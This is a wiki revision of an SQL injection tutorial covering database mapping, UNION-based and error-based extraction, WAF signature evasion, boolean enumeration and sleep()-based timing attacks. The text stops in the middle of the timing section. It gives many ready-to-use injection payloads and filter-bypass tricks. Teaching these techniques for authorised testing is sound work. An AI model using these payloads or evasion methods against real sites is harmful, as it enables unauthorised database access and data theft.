Revision as of 14:02, 7 May 2012

SQL injection is a method of exploiting web applications performed over http or https to compromise the underlying database engine supporting dynamic content for the web application itself. Successful exploitation of an SQL injection vulnerability can result in the attacker gaining unfettered access to the database and can lead to further privilege escalation.

Typically, databases include things like (but not limited to):

Authentication credentials
Other identifying information about a user (like an IP address)
Site configurations
Site content and themes
Communications between users within the site

SQL injection requires a basic understanding of SQL and manipulation of SQL data

We'll be updating this page relatively frequently, if it does not have the answer to your question, you can try us in IRC, or check back later. If you try us in IRC, we'll do our best to help you find the solution. Also, if you see missing things you'd like to contribute, don't hesitate to contact us.

It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you

1 Cause(s) of vulnerabilities
2 Potential Target Environments
- 2.1 Navigating Unfamiliar Databases without the C API
- 2.2 Databasing engines compared and contrasted in light of SQL Injection
3 Modern day SQL Injection Obstacles and Countermeasures
4 Basic Remote Tests for SQL Injection Vulnerabilities
- 4.1 Injection Points
- 4.2 Input Testing
  - 4.2.1 Your First Where Clause Injection
  - 4.2.2 Reconstructing injected Queries
5 Bypassing Modern SQL Injection Security Measures
6 Intermediate SQL Injection
7 Advanced: Manual Boolean Enumeration
- 7.1 Using Ascii codes and the ascii() function for enumeration
  - 7.1.1 substring()
  - 7.1.2 Version Fingerprinting with ascii-based enumeration
    - 7.1.2.1 In theory
    - 7.1.2.2 In Practice
- 7.2 Using Regular Expressions for Boolean enumeration
  - 7.2.1 Getting started with regular expressions
  - 7.2.2 Version fingerprinting using compatible regular expressions
8 Expert: Timing attacks for automated boolean enumeration
9 Expert: Automated Single-byte exfiltration

Cause(s) of vulnerabilities

If you haven't already done so, now is a good time to orient yourself with SQL servers and queries with our SQL primer, otherwise you may get lost in this text easily.

SQL Injection occurs when input from a user is directly passed to a SQL query by an application. In the context of web applications, user input comes from HTTP input.

Un-sanitized user input - The developer made no effort to stop an injection attack
Improper type handling - An integer sanitized or otherwise treated as a string, or vice versa
Lack of output filtering - Output from a query that had user input passed to it is used as input in later queries when rendering the page
Cookies and other "hidden" forms of communication in the HTTP request header are also processed as user input and can be considered attack vectors as well.

Potential Target Environments

A variety of environments are vulnerable to SQL injection. Nearly all of the interpreted languages and compiled languages could be used to write a vulnerable application. Databasing engines such as MySQL, PostgreSQL, Microsoft SQL Server, or Oracle could be used in a vulnerable application. It is important to note the HTTP server's version information along with the programming language in use by any application during testing. This in conjunction with Operating System information will assist during privilege escalation with injection.

Navigating Unfamiliar Databases without the C API

Nearly every modern databasing engine has an information_schema database or schema. Important tables that are part of information_schema include schemata, routines, columns, and tables.

MySQL Database Mapping

When outside of the C SQL API, access the data structure via the information_schema database.

Show Databases equivalent:

SELECT schema_name FROM information_schema.schemata;

Show tables equivalent:

SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=[database_name]

Show fields equivalent:

SELECT column_name FROM information_schema.columns WHERE TABLE_NAME=[TABLE_NAME] AND table_schema=[database_name]

If you know you've only got access to the currently selected database, you can save some time by using the database() function or @@database environment variables, e.g. where table_schema = database() or where table_schema = @@database.

PostgreSQL Mapping

PostgreSQL has the current_database() function in stead of the database() function.

\dn equivalent:

SELECT schema_name FROM information_schema.schemata WHERE catalog_name=[DATABASE name]

\dt equivalent:

SELECT TABLE_NAME FROM information_schema.tables table_type='BASE TABLE' AND table_schema=([schema_query]) AND catalog_name=[DATABASE name]

\d [column_name] equivalent:

SELECT column_name FROM information_schema.columns WHERE TABLE_NAME=([table_query]) AND table_schema=([schema_query]) AND catalog_name=[database_name]

MS SQL Mapping

It's important to note MS SQL is a bit different when it comes to ordered single-cell selection.

Notice: We don't currently have a method of listing all of the database names in MS SQL. If you have a copy that one of our developers can use for testing to improve this article, please don't hesitate to let us know in IRC.

Listing Tables:

SELECT TABLE_NAME FROM information_schema.columns WHERE table_catalog=[database_name] GROUP BY TABLE_NAME ORDER BY TABLE_NAME ASC;

Listing Columns:

SELECT column_name FROM information_schema.columns WHERE table_catalog=[database_name] AND TABLE_NAME=[table_query] GROUP BY column_name ORDER BY column_name ASC

Legacy Databases

The information_schema database entered the open source community in MySQL version 5 and at the end of PostgreSQL Version 7.3; old and current versions of SQL engines contain their schema information in their administration databases. You can find more information on this by combining techniques listed here with the manuals and documentation.

Access/MSSQL sysobjects table/database (Legacy Access/Jet Engine) msysobjects table/database (Legacy SQL Server CE)

PROCEDURE ANALYSE might come in handy.

MySQL 4 MySQL.columns_priv MySQL.tables_priv MySQL.db

It is typical that legacy database versions require privileged access for flexible mapping.

Databasing engines compared and contrasted in light of SQL Injection

For compatibility purposes it is important to be mindful of what functions, environment variables, and tables are ubiquitous. When writing an automated attack tool, it is convenient to be able to use the same function in each SQL dialect, rather than choosing a function or variable per sql version.

Additional similarities are added each update to the various database engines. Read the manuals for the affected engines to get an up-to-date view.
Not all similarities or differences are documented here, only those relevant to SQL injection.
Similarities and differences between database engines include table and column names, function names, environment variables, and statement syntax.

There are enough similarities that it is possible to have a degree of universal exploitation.

Information_Schema

All of the databasing engines that presently have an information_schema collection have the following in common:

The information_schema.tables table has a table_name column.
The information_schema.columns table has both table_name and column_name columns.
All of them have information_schema.routines and information_schema.schemata tables.

Functions & Environment Variables

Similarities between the different engines

MS SQL, MySQL, and PostgreSQL share the following:

ascii()
substring()
count()
lower()
upper()
BETWEEN ... AND ... conditional operator

MySQL and Postgres share the following:

current_database()
version()
current_user

MySQL and MSSQL share the following:

database()
@@version

Other syntax

All of the databases share the same comparison operators, basic SELECT, WHERE, GROUP, and ORDER syntax. PostgreSQL and MySQL now also share the same LIMIT syntax}}

LIMIT [COUNT] offset [ROW TO START at]

Microsoft SQL does not have a LIMIT clause. In stead, sub-queries with SELECT TOP and ORDER BY clauses are used as a workaround. This makes for a less readable query and a more frustrating attack.

SELECT top 1 $column FROM (SELECT top $OFFSET $column FROM $table [WHERE clause] [GROUP BY clause] ORDER BY $column DESC) sq [GROUP BY clause] ORDER BY $column ASC

Capabilities

Different SQL databasing engines have different capabilities. As a result, there are advantages and disadvantages passed to an attacker for each limitation or unique piece of functionality that a SQL server may have to offer.

MSSQL Has the ability to execute server side commands natively via xp_cmdshell. This feature can be enabled or disabled (remotely), and other functions exist to read/write to the windows registry.
MySQL has the ability to read and write to files using the LOAD DATA and SELECT ... INTO OUTFILE ... statements as well as the load_file() function.
PostgreSQL is the only databasing engine which supports trigger functions or other user-defined functionality added to a table in most procedural scripting languages (Perl,Python,Ruby).

Modern day SQL Injection Obstacles and Countermeasures

Obstacles can occur on various layers of the OSI model. The software layer may filter your input during its processing. The network layer may be monitored by a NIDS or IPS and begin to drop traffic, add captcha verifications, or redirect you to a honeypot. The HTTP server may also be running a Web Application Firewall. A researcher or penetration tester may find overcoming these obstacles difficult, but usually not impossible given enough dedication.

Configuration & Environment Challenges

Due to certain vulnerabilities requiring the use of boolean enumeration or timing attacks, many HTTP requests may be needed in order to successfully determine database contents, making the process of arbitrarily accessing data quite time consuming and noisy. Different databasing engines have different configuration settings, but usually include some form of maximum number of connections, maximum query size, maximum results size, maximum number of connections per user or client, and other resource restrictive options. Simply distributing a time consuming attack may only hinder the attacker by exhausting resources.

Database permissions and role-based-access control integration for the application may also play a large role in the amount of data an attacker may gather, as SQL injection only exploits in the context of the active connection to the SQL server that the vulnerable query executes within (ie. the username and password that the application is using for the query being exploited). Programming languages have different configurations for runtime as well, such as memory limits and maximum execution time when configured to run in conjunction with a webserver. Older versions of database servers may not have an information_schema database and may require a privileged user (like the database server administrator) to access any schema information.

IDS, IPS, and Web Application Firewalls

Web application firewalls usually operate at the same layer as the HTTP server or web applications, and thus monitor the protocol and input layers. This is different than normal IDS, which are stand-alone pieces of software or hardware that inspect the network and the host layer. Most intrusion detection mechanisms built for web applications operate using signature-based detection. Therefore, as long as an attack does not match a signature, it will slip by most of them.

Common Web Application Firewall HTTPD Modules

Mod_Security (Apache)
Naxsi (Nginx)
ISAPI Filters (Microsoft IIS)

Common signatures use regular expressions that will match (and block) many common or simple testing techniques.

Improper Sanitizing

Any time improper sanitizing takes place there is a potential for partial sanitizing, and may make the exploitation process highly difficult if not impossible.

Partial sanitizing

Partial sanitizing may affect any or more (unlisted here) of the following important syntax characters and result in them being encoded in some fashion, escaped, or removed entirely.

The space character (or all whitespace)
The single quote character: '
The double quote character: "
The tag characters: < and >
The equals character: =
The comma character: ,
The parenthesis characters: ( and )

Deprecated Sanitizing

PHP's addslashes() function (now deprecated) relied on the unhex() function. The goal of addslashes() was to add an escape (\) behind any single quotes (') entered into a string. When multi-byte character sets (or collations) are in use, this can cause a vulnerability to occur. If a valid multi-byte character ends in 0x5c (the escape), it is possible to circumvent the escape completely by placing the first byte of that character before the single quote. When unhex() is called against the now escaped single-quote, it sees the two bytes as a single character, allowing the quote (0x27) to escape the string unscathed. An example prefix for a non-utf8 character set's multi-byte prefix that accepts 0x5c as an ending is 0xbf, so one could use %bf%27 in a url to bypass the use of addslashes().

Basic Remote Tests for SQL Injection Vulnerabilities

There are a number of factors to take into consideration when analyzing a SQL injection vulnerability. These factors will determine methodology for successful exploitation. SQL injection vulnerabilities are typically either standard injection vulnerabilities, error-based vulnerabilities, or blind vulnerabilities, blind being the most difficult of the three.

Standard vulnerabilities - The page can be exploited by using the UNION SELECT or UNION ALL SELECT statements to simply display selected data on the page.
Error-based vulnerabilities - Error based vulnerabilities occur when verbose errors from the SQL databasing engine are enabled and displayed on the page. Thus, attackers may use things such as illegal type conversions to throw errors containing data.
Blind vulnerabilities - Blind SQL injection vulnerabilities are not only the most difficult to exploit, but also the most time consuming. Timing attacks and boolean enumeration are the only methods of successful exploitation of select statements.

Injection Points

An SQL injection vulnerability's type is determined by the location of the user input. $input is used as an example input variable in the queries below to illustrate their classifications.

SELECT ... WHERE clause injection

$query = "select * from table where id=$input";

SELECT ... LIMIT, OFFSET, ORDER BY, and GROUP BY clause injections

$query = "select * from table limit $input"; $query = "select * from table limit 1 offset $input"; $query = "select * from table order by $input"; $query = "select * from table group by $input";

UPDATE ... SET clause injection

$query = "update table set var=$input";

UPDATE ... WHERE clause injection

$query = "update table set var=value where column_name='$input'";

INSERT ... VALUES clause injection

$query = "insert into table values(null,$input)";

Input Testing

Vulnerabilities always stem from user input. In web applications, user input may come from a variety of places: forms, cookies, GET parameters, and other request headers. In order to test for vulnerabilities remotely, researchers test the urls, forms, and cookies associated with the site or software of interest.}}

Your First Where Clause Injection

The most reliable of tests consist of boolean challenges that filter the results a query returns combined with arithmetic operators. Boolean challenges will return zero rows if conditions are not met, whereas they will return the same value if the conditions are met. This way researchers are able to determine vulnerability via a "true/false" test.

In our first example (using $id) we have an unsanitized integer. The URI (uniform resource indicator) may look something like:

 /article_by_id.php?id=10

A researcher could check that URI against:

 /article_by_id.php?id=10%20AND%201=1
 and
 /article_by_id.php?id=10%20AND%201=0

When a page is vulnerable, the page on

 /article_by_id.php?id=10%20AND%201=1

will match the page on:

 /article_by_id.php?id=10

however the page at:

 /article_by_id.php?id=10%20AND%201=0

will have data (and likely the entire article) missing.

In our second example, using $title, the same affect can be achieved on an unsanitized string with the following URI's:

 /article_by_title.php?id=SQL%27%20AND%20%271%27=%270
 /article_by_title.php?id=SQL%27%20AND%20%271%27=%271

The same methodology as the integer test applies, merely with added single quotes (%27).

Most of today's security systems will easily identify and block simple testing methods like those illustrated above.

Reconstructing injected Queries

You will only be able to reconstruct queries locally if you install the SQL database engines. Links are provided at the end of the page for those who'd like to follow along. Lets concrete this in your head. Using the above testing examples, we'll reconstruct the queries generated from our url tampering.

Original Query:

$query = "select * from articles where id=$id";

Generated Queries:

$query = "select * from articles where id=10 and 1=1"; $query = "select * from articles where id=10 and 1=0";

Or, alternatively, we can look at our $title example:

Original query:

$query = "select * from articles where title='$title'";

Generated queries:

$query = "select * from articles where title='SQL' and '1'='0'"; $query = "select * from articles where title='SQL' and '1'='1'";

The values of $id and $title are being passed directly into the SQL query. Because 1 will always equal 1, the results are passed directly back. When the false test (1=0) is applied, no data is returned by the query because there is no row in the database where 1=0. 1 always equals 1.

Bypassing Modern SQL Injection Security Measures

Simply triggering an IPS or WAF and having your request blocked under only certain conditions does not confirm the vulnerability of the page.

To exploit or even test web applications in the modern world, we'll need to recognize it when countermeasures are in place and be able to defeat them. A WAF is probably in the way if you're experiencing:

Having the connection to the server reset ONLY when testing the site for vulnerabilities
403 Forbidden responses ONLY when testing the site for vulnerabilities
Being blocked by the remote firewall after a repeatable number of injection attempts

Many IDS and WAF systems can be easily evaded by either:

Simply using SSL or HTTPS
Using a de-syncronization attack like session-splicing when SSL is not an option.

Basic Signature Evasion

Signature evasion is very similar to evading partial sanitizing. In stead of modifying your characters, an IPS drops traffic if your characters appear in a particular sequence in order to match a pattern. By discovering that sequence, we can make adjustments to our queries to evade the IPS or WAF in the way of our testing. Many web application firewalls will recognize the "1=1" test simply due to its popularity. Other queries that are very similar may also be noticed. Lets suppose the signature is looking for something along the lines of [integer][equal sign][integer], or that a request with "AND 1=1" had its connection reset, but the page without the injection continues to load.

Whitespace placement

Take note of the whitespace around the = operator. If there is none, try adding a space. If there's a space on each side, try removing or adding one to see if there isn't a proper length delimiter on the signature. You may find lopsided, missing, or extra whitespace may bypass signature-based analysis engines.

 %20and%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%201=%20%20%20%201 (TRUE)
 %20and%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%201=%20%20%20%200 (FALSE)

Integer and string size delimiters

Because there is usually a size delimiter or a maximum size to the integer, we can exceed that size to stop ourselves from being detected. Ten digit random numbers, in stead of the single digit predictable numbers might do the trick.

 %20and%402837649781237849=402837649781237849 (TRUE)
 %20and%201789236419872364=128756128398671289 (FALSE)

Switching up the data types

If integers are giving you a hard time, the signature may be tuned too specifically to integers. Try mixing the comparisons up a bit, using strings or floating point values to de-rail the signature.

 %20and%205.8=5.8      (TRUE)
 %20and%200.2=0.3      (FALSE)

Arithmetic tests

In stead of comparing a value like "1=1", try comparing mathematical expressions. Mathematical expressions may be the key to bypassing your problem if you're still jammed up on a signature detection.

 %20and%201.2+3=4.2    (TRUE)
 %20and%200.2-1=0      (FALSE)

Capitalization

If you're still having problems during testing, this probably isn't your issue. Try changing the case of the letters making up your boolean operator (and to AnD and or to oR).

Extending conditional statements

Many IDS signatures will look for a boolean operator ("and" or "or") before a conditional statement if it is being appended to another conditional statement (e.g. after query reconstruction we have where id=1 and 1=1, there are two conditions there).

Using IF for MySQL injection:

The syntax for the IF statement in MySQL is:

IF([condition],[VALUE TO RETURN IF TRUE],[ELSE RETURN VALUE])

 %20and%20if(10829361=10829361,1,0)  (TRUE)
 %20and%20if(98276232=72619126,1,0)  (FALSE)

You can use any combination of the above techniques in conjunction with one another as long as your queries still return true and false.

Defeating partial sanitizing

You'll likely hit a brick wall if you try to bypass the sanitizing by breaking the sanitizing method. Instead, focus on evading the sanitizing by crafting queries that do not require sanitized characters.

Quotes

MySQL and certain versions of Microsoft SQL allow for string literals to be passed in hexadecimal format.:

 select 'abc';
 ...is equivalent to...
 select 0x616263;.
 Additionally, PostgreSQL allows you to use two dollar signs as string delimiters
 select $$abc$$;

Therefore, 0x616263 can be used in place of 'abc'. This will come in handy while exploiting a WHERE clause and not being able to use quotes.}}

String concatenation can avoid the use of quotes the use of quotes in:

MySQL:

 Using the char() function to construct the string 'abc':
 select char(97,98,99);
 ->Similar to the hex example, char(97,98,99) can be used interchangeably with the string 'abc'.

PostgreSQL:

 Using the chr() function and double-pipe concatenation operator:
 select chr(97)||chr(98)||chr(99);
 ->Similar to the above example, chr(97)||chr(98)||chr(99) can be used interchangeably with the string 'abc'.

Microsoft SQL Server:

 Using the char() function and plus operator:
 select char(97)+char(98)+char(99);
 ->Similar to the other examples, char(97)+char(98)+char(99) can be used interchangeably with the string 'abc'.

Whitespace Filtering

We can bypass filtering on the space character by using alternative whitespace characters to the space character (%20). Most SQL engines consider a line return (%0a in a *NIX environment, %0a%0d in a Windows environment), tab characters, or the + character as valid whitespace:

 and%0a1=1
 and%0a1=0
 and+1=1
 and+1=0

MySQL treats block comments as whitespace.

AND/comment1/1/comment2/=/comment3/1 AND/comment1/1/comment2/=/comment3/0

Bypassing XSS Filters During SQL Injection

If you've run into XSS filtering, chances are the standard comparison operators (=, <,>) are being filtered out. If this is the case, we need to use alternative comparison operators:

[VALUE] BETWEEN ... AND ... [VALUE] REGEXP [PATTERN] - MySQL [VALUE] RLIKE [PATTERN] - MS SQL [VALUE] ~ [PATTERN] - PostgreSQL

Testing with BETWEEN

The between operator is universal across all SQL platforms.

The between comparison operator will return true or false based on whether or not the preceding value is between a ceiling and a floor in a range. For example, 50 is between 0 and 100, but 300 is not, which lets us safely avoid using the = operator in our query:

 and%2050%20between%200%20and%20100   (True)
 and%20300%20between%200%20and%20100  (False)

This turns the query into something like:

 select * from articles where id=1 and 50 between 0 and 100
 select * from articles where id=1 and 300 between 0 and 100

The between operator can also be used on strings:

 and%20'c'%20between%20'a'%20and%20'm (True)
 and%20'z'%20between%20'a'%20and%20'm (False)

Testing with Regular Expression Operators (REGEXP, ~, and RLIKE)

Different database engines have different operators for Regular Expressions:

MySQL uses the REGEXP operator.

PostgreSQL uses the ~ operator.

MS SQL uses the RLIKE operator.

Regular expressions are the most evasive method for remote SQL injection possible, as they lack many of the common syntax characters necessary for other forms of injection.

The following tests contruct strings using native string constructors to bypass any requirement for quotes. If you need more information regarding this, please see our entry on evading quotation and apostrophe sanitizing.

Below are either hexadecimal character codes or ascii code equivilent characters being translated into a string by the SQL server. You'll need to get used to these in order to become proficient in SQL injection.</i>

MySQL testing:

True: AND 0x2e REGEXP 0x2e False: AND 0x6a REGEXP 0x7a

PostgreSQL testing:

True: AND chr(97) ~ chr(97) False: AND chr(98) ~ chr(99)

MS SQL testing:

True: AND CHAR(97) RLIKE CHAR(97) False: AND CHAR(104) RLIKE CHAR(64)

Intermediate SQL Injection

There are various methods for exploiting various databasing engines, including MySQL, PostgreSQL and Microsoft SQL server. Different engines may require different function names, environment variables, or syntax nuances for proper effectiveness.

We did not include expample testing for UPDATE or INSERT queries using subqueries. In those cases, it is best to escape the argument, use a comma delimiter, and testing using integers until the right number of columns is found. Then you can substitute column values for insert and delete using subqueries that return a single cell rather than a single byte, similar to single-byte exfiltration

Automation Theory

The most important thing when automating SQL injection is recognizing boundaries.

Loop Delimeters:

Length of single cell strings (length sql functions)

SELECT LENGTH(USER()) SELECT CHAR_LENGTH(USER()) SELECT len(USER())

Number of rows returned by a query (count sql functions)

SELECT COUNT(column_name) FROM information_schema.columns WHERE TABLE_NAME=[TABLE_NAME] AND table_schema=[DATABASE]

Obtaining data types:

Data types of single cells (type from information_schema.columns)

SELECT column_type FROM information_schema.columns WHERE TABLE_NAME=[TABLE_NAME] AND column_name=[column_name] AND table_schema=[DATABASE]

Protip: Its a good idea to use order by every time you inject in case results are not constant due to where clause restraints.

Sometimes you won't be able to select integer values when using error-based injection. There's more than one way to solve this.

Predefined scope Use ORDER by to find the upper most row and lower most row of the results set. You can stop by starting at an element on one end and then keeping your order by clause intact, incrementing your offset; you'll know when to stop when you've reached the value on the other end of the table. $stop_value = "select id from table order by id desc limit 1 offset 0"; $start_query = "select id from table order by id asc limit 1 offset 0"; In your loop: $loop_query = "select id from table order by id asc limit 1 offset $counter"; When the value returned by $loop_query equals the value from $stop_query, terminate the loop. Cast and concatenate attempt to string concatenate a character to the integer to throw an error.

Here's a few variables to be aware of while writing automated exploit software.

Counters: Row Counter Byte Index Counter Temporary Variables: Length of current target cell Number of rows in current target table SQL Dialect Variables: Sanitized Syntax Characters Whitespace character(s) String concatenation operator Comment syntax

Basic Injection : Union Select

The UNION operator allows you to collect the output of two SELECT statments with UNION ALL SELECT or UNION SELECT so long as the results have the

same number of columns:

SELECT COLUMN FROM TABLE UNION ALL SELECT COLUMN

Determining the number of Columns

The number of columns can be determined using ORDER BY injection and incrementing a field index, for example:

 /article.php?id=1 ORDER BY 1 asc
 /article.php?id=1 ORDER BY 2 asc

Notice:

When the page no longer displays, you've hit your boundary. The largest number in the order by clause that still allows the page to display properly is your number of columns.

Extracting Data

If we know the number of columns in a table (for example, by using the ORDER BY injection technique), we can use the following injection assuming that there are 2 columns:

 /article.php?id=5 UNION ALL SELECT 1,2/*

Protip: Sometimes UNION ALL SELECT will not work, but UNION SELECT will, and vice versa. This has to do with the SQL engine and vulnerable web application's programming or SQL queries. Additionally, you may have to set an invalid ID (e.g. -1) to get the data your UNION SELECT returns to display on the page.

This generates the following query:

SELECT * FROM ARTICLES WHERE id=5 UNION ALL SELECT 1,2/*

Notice: This selects every entry where both id=5 and where column = 1 or 2. If the number 1 or 2 was outputted, we would know that UNION works. If 2 was outputted, we know that the application's programming displays the second column on the page. (This could be any column, really.)

An example of SQL injection using union select to obtain the SQL version:

 /article.php?id=-1 UNION ALL SELECT 1,version()/*

The version information should now be displayed in the area where the number `2' originally displayed.

Once we know this, obtaining data is as simple as setting up the query as a simple select:

 /article.php?id=-1 UNION ALL SELECT 1,table_name from information_schema.tables where table_schema=database() limit 1/*

In this case, the first table name in the current database should be displayed in stead of the version information.

This particular injection appears at first glance to be limited to a single entry (unless more columns are available for display), but in truth one can use the string concatenation functions or operators (+, ||, concat(), group_concat(), etc) to display the contents of several columns and/or rows as a single string:

 /article.php?id=-1 UNION ALL SELECT 1,group_concat(table_name,0x2e,column_name) from information_schema.columns where table_schema=database()/*

Which would format a map of a MySQL database in the format:

table1.column1, table1.column2, table2.column1

The amount of data that can be returned returned by the group_concat() function is set by a session environment variable.

Intermediate Testing: "SELECT" ... LIMIT clause injections

Protip: Microsoft SQL Server does not feature this classification of vulnerability due to its lack of a LIMIT clause, however similar techniques to the LIMIT clause attack will work on it as well as other database engines:

GROUP BY clause injection ORDER BY clause injection

To test for injection in a LIMIT clause, it is first necessary to determine which input of the LIMIT clause you are injecting into. We'll use the following example URI:

 /view_results.php?start=30&perpage=10

A LIMIT clause may have two different inputs, one being the number of rows to return, the other being what row to start from when selecting the rows. On recent versions of MySQL the limit clause syntax is congruent to PostgreSQL syntax:

LIMIT $perpage OFFSET $start

On older versions of MySQL, the offset operator was not supported. In those cases we'll be using the older syntax:

LIMIT $start,$perpage

Because the input is located at either $start or $perpage in a LIMIT clause, we can deduce that:

 UNION SELECT is the only available method for successful exploitation.
 We will have to comment out the rest of the query for successful exploitation

In order to access UNION SELECT if there are data limitations:

 The LIMIT clause must be given an impossible starting offset so that no data will be displayed,
 making room for data returned by the UNION SELECT.  The offset will have to be a larger number
 than the number of rows returned by the query.

Intermediate Injection: Information retrieval via verbose errors

Notice: This technique relies on the following database and application characteristics:

Sometimes databases display errors containing selected data even though union select is not an option.
Sometimes the application will display SQL errors on the page.

Protip: There are two ways to cause errors that contain data:

An impossible cast
A duplicate key in a group by statement

When a web application displays its SQL errors, there's a few things we can do to make errors display data along with them. In each of the examples below, the @@database variable or current_database()/database() functions return what we see for error output. These can be replaced with any subquery'd select statement that returns a single cell.

MSSQL:
```
 
```

AND 1=CAST(@@DATABASE AS INT)--

 
 AND 1=CONVERT(INT,@@DATABASE)--

MySQL:
```
 
```

 AND 1=2 OR ROW(1,1) > (SELECT COUNT(*),concat(DATABASE(),0x3a,FLOOR(rand()*2) ) x FROM (SELECT 1 UNION SELECT 2) a GROUP BY x LIMIT 0,1)

PostgreSQL:
```
 
```

 AND 3=5 OR (SELECT CAST(current_database() AS NUMERIC)) = (SELECT CURRENT_USER())

Advanced: Manual Boolean Enumeration

Boolean enumeration is the process of using conditional statements (true and false, just like our testing methodology) to determine the value of a byte.

The maximum value of any byte is 255 and the minumum is 0. There are 8 bits in one byte A bit can be 1 or 0 (True or False) Therefore, logic dictates that, By asking no more than 8 true/false questions, one should be able to determine the value of a byte.

There are primarily two methods to using boolean enumeration. One involves selecting a byte from a single-cell of a database and testing for true or false against its character or ascii code, the other involves selecting a single-cell and comparing it with a regular expression.

*Fortunately for us, universal operators and universal functions include:* BETWEEN ... AND ... \| Operator = < > \| Operators substring() \| Function ascii() \| Function This assists us with crafting uniform queries that affect ALL sql dialects.

Protip: Basic enumeration using standard operators is possible, although usually filtered by one of today's many obstacles to injection attacks, so we'll be using the BETWEEN operator for demonstration purposes in stead.

In order to ensure that we maintain data integrity: Always use a LIMIT on select statements in subqueries Always use ORDER BY on select statements in subqueries, and keep the column name the same.

Using Ascii codes and the ascii() function for enumeration

The ascii() function on any given database engine will return the ascii code for the the character passed to it. If it is passed an entire string, it will return the ascii code for the first character. For example:

SELECT ascii('a'); +------------+ \| ascii('a') \| +------------+ \| 97 \| +------------+ 1 ROW IN SET (0.00 sec)

substring()

Using substring() to select a single byte:

The substring() syntax is:

SUBSTRING([STRING],[POSITION],[LEN])

To select the first character of a string, for example:

SELECT SUBSTRING('abc',1,1); +----------------------+ \| SUBSTRING('abc',1,1) \| +----------------------+ \| a \| +----------------------+ 1 ROW IN SET (0.00 sec)

To select the second character:

SELECT SUBSTRING('abc',2,1); +----------------------+ \| SUBSTRING('abc',2,1) \| +----------------------+ \| b \| +----------------------+ 1 ROW IN SET (0.01 sec)

Protip: You can use the upper() and lower() functions to convert results to all uppercase or all lowercase. This will remove a set of ascii characters from possible values during testing.

Version Fingerprinting with ascii-based enumeration

 While boolean enumeration can be used to obtain any type of data, we're using version fingerprinting as our example.

In theory

For our examples we're using the version() function.

Protip: If the version() function fails, try the @@version environment variable instead.

The ascii code of the first character of the version string can be accessed by calling:

 ascii(substring(lower(version()),1,1))

On PostgreSQL, the first character of version() is 'P'. Since we're converting it to lowercase, the ascii value of 'p' is 112.

postgres=# SELECT ascii(SUBSTRING(LOWER(version()),1,1)); ascii ------- 112 (1 ROW)

On MySQL, the first character of version() is numeric. On our local example, the first character is '5'.

 mysql> SELECT ascii(SUBSTRING(LOWER(version()),1,1));
  +----------------------------------------+
  | ascii(SUBSTRING(LOWER(version()),1,1)) |
  +----------------------------------------+
  |                                     53 |
  +----------------------------------------+
  1 ROW IN SET (0.00 sec)

In Practice

These queries work on MS SQL as well, an MS SQL server was not available during the writing of this article for demonstration. The same syntax, except using the @@version environment variable applies.

Using the between ... and ... comparison statements, we can isolate the value:

 /vulnerable.ext?id=1 and ascii(substring(lower(version()),1,1)) between 0 and 127
 /vulnerable.ext?id=1 and ascii(substring(lower(version()),1,1)) between 128 and 255

You can adjust the range delimiters on the between statement while it returns true until both parameters are equal. When both parameters are equal and the query returns true, you've found the value of the byte:

SELECT * FROM sample WHERE id=1 AND ascii(SUBSTRING(LOWER(version()),1,1)) BETWEEN 53 AND 53;
  +----+---------------------+
  | id | sample_text         |
  +----+---------------------+
  |  1 | this IS sample text |
  +----+---------------------+
  1 ROW IN SET (0.01 sec)

Once we've identified the first byte, we can move from the first to the second by changing:

FROM: ascii(SUBSTRING(LOWER(version()),1,1)) TO: ascii(SUBSTRING(LOWER(version()),2,1))

Using Regular Expressions for Boolean enumeration

Regular expressions is by far the best solution to filtering and sanitizing.

MySQL's REGEXP operator is case insensitive. PostgreSQL's ~ operator is case sensitive.

Getting started with regular expressions

Regexp allows you to compare a single byte from a string with a list, similar to between ... and ... injection.

Patterns: Special characters: ^ The beginning of a string $ End of a string . Any character * 0 or more of the preceeding character + 1 or more of the preceeding character ? 0 or 1 of the preceeding character Protip: To see if a string starts with a particular letter (we'll use the letter z for our example), we can use the regular expression pattern '^z'. This will ONLY match if the first character of the string is a 'z'. Ranges and lists: You can specify a range or list inside of square brackets ([ and ]) ranges can include letters and numbers, while lists are specified characters. Pattern \| Description [a-z] \| Matches only letters a through z [0-9] \| Matches only numbers [aeiouy] \| Matches vowels. ^a[0-9] \| Matches if the first character of the string is `a', only if the second character of the string is a number.

Version fingerprinting using compatible regular expressions

Protip: Regular expressions are portable.

 MS SQL and MySQL now both have the RLIKE regular expression operator.

Version enumeration on MySQL and MS SQL:

  AND version() RLIKE '^[0-4]'        -- This will match if the first character of the version is between 0 and 4
  AND version() RLIKE '^[5-9]'        -- This will match if the first character of the version is between 5 and 9

Because PostgreSQL's version() string always starts with 'P' for "PostgreSQL":

  AND LOWER(version()) ~ '^[a-z]'   -- Should ALWAYS return true
  AND UPPER(version()) ~ '^[a-z]'   -- Should NEVER return true

Adjust the ranges to hone in on the value of the byte.

Expert: Timing attacks for automated boolean enumeration

Timing attacks generally fall under two categories:

Boolean enumeration Single byte exfiltration Timing attacks are typically used by automated software due to the difficulty in reliably determining true/false from data being displayed on the page.

MySQL Boolean Timing Attacks

Mysql's primary functions that can time delay are sleep() and benchmark(). Benchmark() is actually a benchmark utility and executes a given query a number of times based on a BIGINT argument, whereas sleep() is a single query.

benchmark() and related issues

Benchmark() may betray your activities

Benchmark() is the rudest (and slowest and least reliable) method for timing attacks, primarily due to the fact that it executes large amounts of queries and is CPU intensive. Any extensive injections using benchmark() are likely to alert a system administrator to the resource consumption; even if he never finds the attack, he'll be called. For this reason we have minimal coverage of the benchmark() function and recommend using a sleep() function call in stead.

Evasive sleep() based boolean enumeration with regular expressions

Some information about our environment:

For testing purposes we've installed MySQL 5.1 locally and created a table called sample:

mysql> SELECT version(); +-----------------+ \| version() \| +-----------------+ \| 5.1.58-log \| +-----------------+ 1 ROW IN SET (0.00 sec)

We've inserted a row of sample data to mimick where clause injection:

mysql> SELECT * FROM sample WHERE id=1; +----+---------------------+ \| id \| sample_text \| +----+---------------------+ \| 1 \| this IS sample text \| +----+---------------------+ 1 ROW IN SET (0.00 sec)

}}

Testing for the ability to sleep():

It is very simple to test for access to the sleep() function:

Sleep for 15 seconds:

 %20and%20sleep(15)

  mysql> SELECT * FROM sample WHERE id=1 AND sleep(15);

 Empty set (15.00 sec)

Controlling sleep() for enumeration:

Using cast() to gain control of sleep() with regex:

